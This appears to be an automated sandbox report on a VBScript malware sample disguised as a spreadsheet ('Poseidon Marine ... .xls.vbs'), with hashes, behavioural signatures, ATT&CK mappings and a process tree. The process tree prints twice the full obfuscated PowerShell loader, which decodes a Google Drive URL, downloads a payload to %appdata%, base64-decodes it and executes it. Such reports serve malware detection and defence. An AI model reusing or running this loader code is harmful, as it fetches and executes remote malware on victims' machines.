917cd281ff0afc3e0d34b0552f5edebe58318f6f468519efcd690d63fdb23fc6

General

Target

Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs
Size

279KB
MD5

5d3834cac11c37e3bdee72fb190f69c7
SHA1

ac14ebcd913ea2e2d51a8663127139105a50a810
SHA256

5c9f85c6b9a542f488ca18de26cbeb294f86b4e31b61bdbf4ae1cff132d5abf9
SHA512

31d6440e3e62dfca9c8144219d52091cf4cd65e806c12ecd5be01839118e9164e68af6750e12c4039cfba8d76a78c7f900f34a5a2eb26ef9fa39cc8ba566c735
SSDEEP

6144:LKdAYDLBLW+8A1ytW3xrbjsSFuHeEC57kdmXl45zaoGGqAP3MQ9scO9q8phwF1X/:mnS2ImgOcX46l

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

4 5000 WScript.exe
32 4180 powershell.exe
34 4180 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

31 drive.google.com
32 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3456 2720 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

4180 powershell.exe
4180 powershell.exe
2720 powershell.exe
2720 powershell.exe
2720 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4180 powershell.exe
Token: SeDebugPrivilege 2720 powershell.exe

flow	pid	process
4	5000	WScript.exe
32	4180	powershell.exe
34	4180	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	WScript.exe

flow	ioc
31	drive.google.com
32	drive.google.com

pid	pid_target	process	target process
3456	2720	WerFault.exe	powershell.exe

pid	process
4180	powershell.exe
4180	powershell.exe
2720	powershell.exe
2720	powershell.exe
2720	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4180	powershell.exe
Token: SeDebugPrivilege	2720	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 5000 wrote to memory of 4180	5000	WScript.exe	powershell.exe
PID 5000 wrote to memory of 4180	5000	WScript.exe	powershell.exe
PID 4180 wrote to memory of 4484	4180	powershell.exe	cmd.exe
PID 4180 wrote to memory of 4484	4180	powershell.exe	cmd.exe
PID 4180 wrote to memory of 2720	4180	powershell.exe	powershell.exe
PID 4180 wrote to memory of 2720	4180	powershell.exe	powershell.exe
PID 4180 wrote to memory of 2720	4180	powershell.exe	powershell.exe
PID 2720 wrote to memory of 2036	2720	powershell.exe	cmd.exe
PID 2720 wrote to memory of 2036	2720	powershell.exe	cmd.exe
PID 2720 wrote to memory of 2036	2720	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nflHCopa.eStrafaKonsudRemaneProgrr Langs Teel[,entr$faktosHumiduRdmosb WaisdOversiTnderc ObjehVa,geoUnrectJ,rnhoO arbmColpoi AboneArvetsugen.] Opde=.hawe$UnpeeDMes auUdmntlT.aktmSteveeCykelsTrakt ');$Brndstofafgifter=Blomraadne 'Srb hhAf raeLims.n ichlsPriapiKompod,remydUndereLecidr eoli.Kas aDTalleoKonakw Tro,nIllumlDa.hjoAngo a Com.d desiFFratriBesselPre,oe R pi(Placa$,nderR ulgiuEthnog kiskeFestfmOutbla Eks sSagybkCa,piiPteryn ThymeRicci,Nonsp$ti ssFUdbytoDowntlPatchk.uskee exectVi,ksiR.mstnUdstegNesqusHistok XenoatekninKodifdAbthaiKrel.dScammaHyraxtK.ystegabelr Co,onsamfueVulpisI qui9Nonte1Tmrer)A.lbs ';$Brndstofafgifter=$Tilhuggende[1]+$Brndstofafgifter;$Folketingskandidaternes91=$Tilhuggende[0];Uudviklet (Blomraadne ' Rade$Vogt.gU,klalTurbooScho bAcc,naAgnamludtyd:AdoraGUret,aSpecin sclegNeololParkeiAdapteParercForlyeHers ltradilB.ssaePhotonPendrsSyste=Coe,c(TillgTM,isee Gum.sAbasitB lor-VesteP Batta iscitRaptuhRelis Bagva$ AskeFCanisoThicklattackSvireePt.ryt O.triFedtsnAt eogGl.tssUnenukUndemaHamewnStrutd.nsuliPulvid Toyea ,idetDeikte.usaorm.elenDesmael.mits,onco9E ode1Cra c) Fisk ');while (!$Gangliecellens) {Uudviklet (Blomraadne 'Matt $Ag,ligP lerlRygnioSignebInhalaMultil Pam.:SeparPVildteBaksntEpi ar OveriFu,dac Now oInv glK ryaasod,o=Colla$Sju,ktSalthrForhuu.dmrke Fjer ') ;Uudviklet $Brndstofafgifter;Uudviklet (Blomraadne 'EvapoSSmykktSundha Un.or.vovltGambl-BefraS eadnlShrileSnerte T.iapSatsa Ente.4Gammo ');Uudviklet (Blomraadne 'Witht$Pectig Elecl Ti to Muf bMischaHjemkl E ti: LivsG Sedaa PampnSkum.gh,wailAudioiPlac.eSimplcBugtheneterlPresplStarfeFeifrnAmbrosUncor=Flong(.istiTVectuehe,icsIno ttWince-S glaPSvej.acamittBeaglhCoca, Udda$overtF M.nooUpdrelberoekNeosoePe.sdtB.utti TillnostingCorposM,nsak Pi,ta EnebnPoikidLegetiKaffedKahila Flatt cclieStandrDevilnTermie ,rbesChlor9Raad 1Tvang)Bur a ') ;Uudviklet (Blomraadne 'Pla,t$FebrigSlunglInd.moSnakkbPhotoaPanivl Frdi:Ma,neIColonnM,lkmc,vangoKollinBu stcRectilAscaru PoppdResereDamefn SydstUfor.=l tna$Tils,g Mercl uforo.aranbAdmina iabllNea.c:PopehP.ismurTyvebv S,ieeCirkutBil.ne DuftkT,lres Bacut rghe egenrRotonnCymb,e St.rs Mis.+V,els+Dylan%Refle$ProblL Aprieantida DedenL,yove kr,erNass .Mi trcStrapo ,ootuDen.onKonomtTroki ') ;$Rugemaskine=$Leaner[$Inconcludent];}Uudviklet (Blomraadne 'C.est$ MastgIndt,l Perso.ysoxb.alseaVaginlsla,o:LornnTVifteaSillav etralPrgniemngdem GeepeJudoks CrystForskeStassrCyanosFea,u dem= Bagk ShirtGScr,beTveget Stav-Rec.oCDrageoFort.n,tylatPippeeFin,cntimaltsciur Femin$G nopFSvasto vinl,aseakOverreTeleftSlobbiHovedn AtamgUnderssrlovkRetacaHelionDemardAcidiifpsamdSam,eaKlasst MedaeHirsur As.pnApludeProcusTekno9 Efte1Asr,e ');Uudviklet (Blomraadne ' lack$ SkrigBuc,nlBarneoT.matbMuz,kaPustelKasse:JulelHGrundjDrejbebrydemB.nkav No.diKognasDram,nGe,opiUpayanperibgHande Peric= Alte Bespo[FissiSMi,liyTwittsUnadmt O.dte.aftem Med,.S uabC ,igsoDefatnStreavAfhopeLsninrHyd ot F rn] Fami:Bilin:CemenFAst,arImmenoBon,emGuldkB TilvaZachas VoldeK,rru6Spige4 undSFisketPianerOrangi Blvrn.empeg.geba( ,onf$ Con TAfsala LdervEfterlBo,bneErhvemAparteNonsis Writt T treDem rrTw ess ,dbo)Ta,ke ');Uudviklet (Blomraadne 'Bayal$BeslughonorlAlarmo GodkbSnkekaR,jiclPot s:OverfASpg,fm faulbShivau godhl F,kuaIdol tGad.noSpoutr L.noiGord,eKlaver ProtnFiremeSplej Bipar= Repr Voci[ MetaSBanany s.ejsStridt Sw,reSpotlm Dans.In,onTSkr aeSubsix V gntManc,.WoadyESp inn Ameec UnsaoO.vokd Heari.icronJeanigHvner]Tek t:Telli:malfoABrugeSSe ilCBedmmInazarIGaleg.HoneyGU,fsteIndfitsedesSSkraatt,rnnrNyfalidennen Greeg F.by(Inci,$Ra ioHPseudj CorreStagemS rubvEcstai.vrtesRvekanDispaiBlaubnRat.tgLenni)Futur ');Uudviklet (Blomraadne 'Barn,$Reting Ov.rlKlausoChutebN ctiaLevedlStink:BefloRUd,ivesuscedGrovvdDuusteRebusdUnelaeCostasP,ono= R di$MaxicARkenemChlorbCavilu RecilUnderaSgnehtYoupooAfsp,rFilmkiV keleFinanrZealon,pirieCole.. ImpesPost uUnderb propsspr gtAnti,r.onfii Skabnu,enfgFifth(Heste2 Misv9Camer0Frimi8 Unan0Atr s4 skid,Trolj2Parit8Tiskc1Bonus5Hoved6Samli),ives ');Uudviklet $Reddedes;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4180

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Saltspoonful.Dag && echo $"
3⤵
PID:4484

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nflHCopa.eStrafaKonsudRemaneProgrr Langs Teel[,entr$faktosHumiduRdmosb WaisdOversiTnderc ObjehVa,geoUnrectJ,rnhoO arbmColpoi AboneArvetsugen.] Opde=.hawe$UnpeeDMes auUdmntlT.aktmSteveeCykelsTrakt ');$Brndstofafgifter=Blomraadne 'Srb hhAf raeLims.n ichlsPriapiKompod,remydUndereLecidr eoli.Kas aDTalleoKonakw Tro,nIllumlDa.hjoAngo a Com.d desiFFratriBesselPre,oe R pi(Placa$,nderR ulgiuEthnog kiskeFestfmOutbla Eks sSagybkCa,piiPteryn ThymeRicci,Nonsp$ti ssFUdbytoDowntlPatchk.uskee exectVi,ksiR.mstnUdstegNesqusHistok XenoatekninKodifdAbthaiKrel.dScammaHyraxtK.ystegabelr Co,onsamfueVulpisI qui9Nonte1Tmrer)A.lbs ';$Brndstofafgifter=$Tilhuggende[1]+$Brndstofafgifter;$Folketingskandidaternes91=$Tilhuggende[0];Uudviklet (Blomraadne ' Rade$Vogt.gU,klalTurbooScho bAcc,naAgnamludtyd:AdoraGUret,aSpecin sclegNeololParkeiAdapteParercForlyeHers ltradilB.ssaePhotonPendrsSyste=Coe,c(TillgTM,isee Gum.sAbasitB lor-VesteP Batta iscitRaptuhRelis Bagva$ AskeFCanisoThicklattackSvireePt.ryt O.triFedtsnAt eogGl.tssUnenukUndemaHamewnStrutd.nsuliPulvid Toyea ,idetDeikte.usaorm.elenDesmael.mits,onco9E ode1Cra c) Fisk ');while (!$Gangliecellens) {Uudviklet (Blomraadne 'Matt $Ag,ligP lerlRygnioSignebInhalaMultil Pam.:SeparPVildteBaksntEpi ar OveriFu,dac Now oInv glK ryaasod,o=Colla$Sju,ktSalthrForhuu.dmrke Fjer ') ;Uudviklet $Brndstofafgifter;Uudviklet (Blomraadne 'EvapoSSmykktSundha Un.or.vovltGambl-BefraS eadnlShrileSnerte T.iapSatsa Ente.4Gammo ');Uudviklet (Blomraadne 'Witht$Pectig Elecl Ti to Muf bMischaHjemkl E ti: LivsG Sedaa PampnSkum.gh,wailAudioiPlac.eSimplcBugtheneterlPresplStarfeFeifrnAmbrosUncor=Flong(.istiTVectuehe,icsIno ttWince-S glaPSvej.acamittBeaglhCoca, Udda$overtF M.nooUpdrelberoekNeosoePe.sdtB.utti TillnostingCorposM,nsak Pi,ta EnebnPoikidLegetiKaffedKahila Flatt cclieStandrDevilnTermie ,rbesChlor9Raad 1Tvang)Bur a ') ;Uudviklet (Blomraadne 'Pla,t$FebrigSlunglInd.moSnakkbPhotoaPanivl Frdi:Ma,neIColonnM,lkmc,vangoKollinBu stcRectilAscaru PoppdResereDamefn SydstUfor.=l tna$Tils,g Mercl uforo.aranbAdmina iabllNea.c:PopehP.ismurTyvebv S,ieeCirkutBil.ne DuftkT,lres Bacut rghe egenrRotonnCymb,e St.rs Mis.+V,els+Dylan%Refle$ProblL Aprieantida DedenL,yove kr,erNass .Mi trcStrapo ,ootuDen.onKonomtTroki ') ;$Rugemaskine=$Leaner[$Inconcludent];}Uudviklet (Blomraadne 'C.est$ MastgIndt,l Perso.ysoxb.alseaVaginlsla,o:LornnTVifteaSillav etralPrgniemngdem GeepeJudoks CrystForskeStassrCyanosFea,u dem= Bagk ShirtGScr,beTveget Stav-Rec.oCDrageoFort.n,tylatPippeeFin,cntimaltsciur Femin$G nopFSvasto vinl,aseakOverreTeleftSlobbiHovedn AtamgUnderssrlovkRetacaHelionDemardAcidiifpsamdSam,eaKlasst MedaeHirsur As.pnApludeProcusTekno9 Efte1Asr,e ');Uudviklet (Blomraadne ' lack$ SkrigBuc,nlBarneoT.matbMuz,kaPustelKasse:JulelHGrundjDrejbebrydemB.nkav No.diKognasDram,nGe,opiUpayanperibgHande Peric= Alte Bespo[FissiSMi,liyTwittsUnadmt O.dte.aftem Med,.S uabC ,igsoDefatnStreavAfhopeLsninrHyd ot F rn] Fami:Bilin:CemenFAst,arImmenoBon,emGuldkB TilvaZachas VoldeK,rru6Spige4 undSFisketPianerOrangi Blvrn.empeg.geba( ,onf$ Con TAfsala LdervEfterlBo,bneErhvemAparteNonsis Writt T treDem rrTw ess ,dbo)Ta,ke ');Uudviklet (Blomraadne 'Bayal$BeslughonorlAlarmo GodkbSnkekaR,jiclPot s:OverfASpg,fm faulbShivau godhl F,kuaIdol tGad.noSpoutr L.noiGord,eKlaver ProtnFiremeSplej Bipar= Repr Voci[ MetaSBanany s.ejsStridt Sw,reSpotlm Dans.In,onTSkr aeSubsix V gntManc,.WoadyESp inn Ameec UnsaoO.vokd Heari.icronJeanigHvner]Tek t:Telli:malfoABrugeSSe ilCBedmmInazarIGaleg.HoneyGU,fsteIndfitsedesSSkraatt,rnnrNyfalidennen Greeg F.by(Inci,$Ra ioHPseudj CorreStagemS rubvEcstai.vrtesRvekanDispaiBlaubnRat.tgLenni)Futur ');Uudviklet (Blomraadne 'Barn,$Reting Ov.rlKlausoChutebN ctiaLevedlStink:BefloRUd,ivesuscedGrovvdDuusteRebusdUnelaeCostasP,ono= R di$MaxicARkenemChlorbCavilu RecilUnderaSgnehtYoupooAfsp,rFilmkiV keleFinanrZealon,pirieCole.. ImpesPost uUnderb propsspr gtAnti,r.onfii Skabnu,enfgFifth(Heste2 Misv9Camer0Frimi8 Unan0Atr s4 skid,Trolj2Parit8Tiskc1Bonus5Hoved6Samli),ives ');Uudviklet $Reddedes;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2720

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Saltspoonful.Dag && echo $"
4⤵
PID:2036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 2332
4⤵
- Program crash
PID:3456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2720 -ip 2720
1⤵
PID:1896

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b3232wiu.tyt.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Saltspoonful.Dag
Filesize
415KB

MD5
8d7c0de10ee4ebb04ba7f300783a5515

SHA1
e24e4420a3b99f3031357f5638b539c511e570d7

SHA256
341d57bc35d22b4d579d2325f2e6e03fda71eafd2430bf3c381d358afe34b8fb

SHA512
336a053156ddb454bd905488451f4fb22fdd0d345997eab5e9ba3f5b8c6938aada897ec5b0211adc4464a91d9343919f8b162fc2521ac36ceca86301faa2ebe9

Download Submit
memory/2720-24-0x0000000005350000-0x00000000053B6000-memory.dmp

Filesize
408KB

Download
memory/2720-39-0x0000000006DC0000-0x0000000006E56000-memory.dmp

Filesize
600KB

Download
memory/2720-34-0x0000000005480000-0x00000000057D4000-memory.dmp

Filesize
3.3MB

Download
memory/2720-43-0x0000000075110000-0x00000000758C0000-memory.dmp

Filesize
7.7MB

Download
memory/2720-18-0x0000000002190000-0x00000000021C6000-memory.dmp

Filesize
216KB

Download
memory/2720-19-0x0000000075110000-0x00000000758C0000-memory.dmp

Filesize
7.7MB

Download
memory/2720-20-0x0000000002320000-0x0000000002330000-memory.dmp

Filesize
64KB

Download
memory/2720-21-0x0000000004CB0000-0x00000000052D8000-memory.dmp

Filesize
6.2MB

Download
memory/2720-35-0x0000000005AB0000-0x0000000005ACE000-memory.dmp

Filesize
120KB

Download
memory/2720-23-0x00000000052E0000-0x0000000005346000-memory.dmp

Filesize
408KB

Download
memory/2720-41-0x0000000007D20000-0x00000000082C4000-memory.dmp

Filesize
5.6MB

Download
memory/2720-40-0x0000000006D20000-0x0000000006D42000-memory.dmp

Filesize
136KB

Download
memory/2720-22-0x0000000004BE0000-0x0000000004C02000-memory.dmp

Filesize
136KB

Download
memory/2720-36-0x0000000005AF0000-0x0000000005B3C000-memory.dmp

Filesize
304KB

Download
memory/2720-37-0x00000000070F0000-0x000000000776A000-memory.dmp

Filesize
6.5MB

Download
memory/2720-38-0x0000000006030000-0x000000000604A000-memory.dmp

Filesize
104KB

Download
memory/4180-13-0x0000028F5B9C0000-0x0000028F5B9D0000-memory.dmp

Filesize
64KB

Download
memory/4180-14-0x0000028F5B9C0000-0x0000028F5B9D0000-memory.dmp

Filesize
64KB

Download
memory/4180-46-0x00007FFE58EB0000-0x00007FFE59971000-memory.dmp

Filesize
10.8MB

Download
memory/4180-12-0x00007FFE58EB0000-0x00007FFE59971000-memory.dmp

Filesize
10.8MB

Download
memory/4180-17-0x0000028F5B9C0000-0x0000028F5B9D0000-memory.dmp

Filesize
64KB

Download
memory/4180-2-0x0000028F5DB40000-0x0000028F5DB62000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing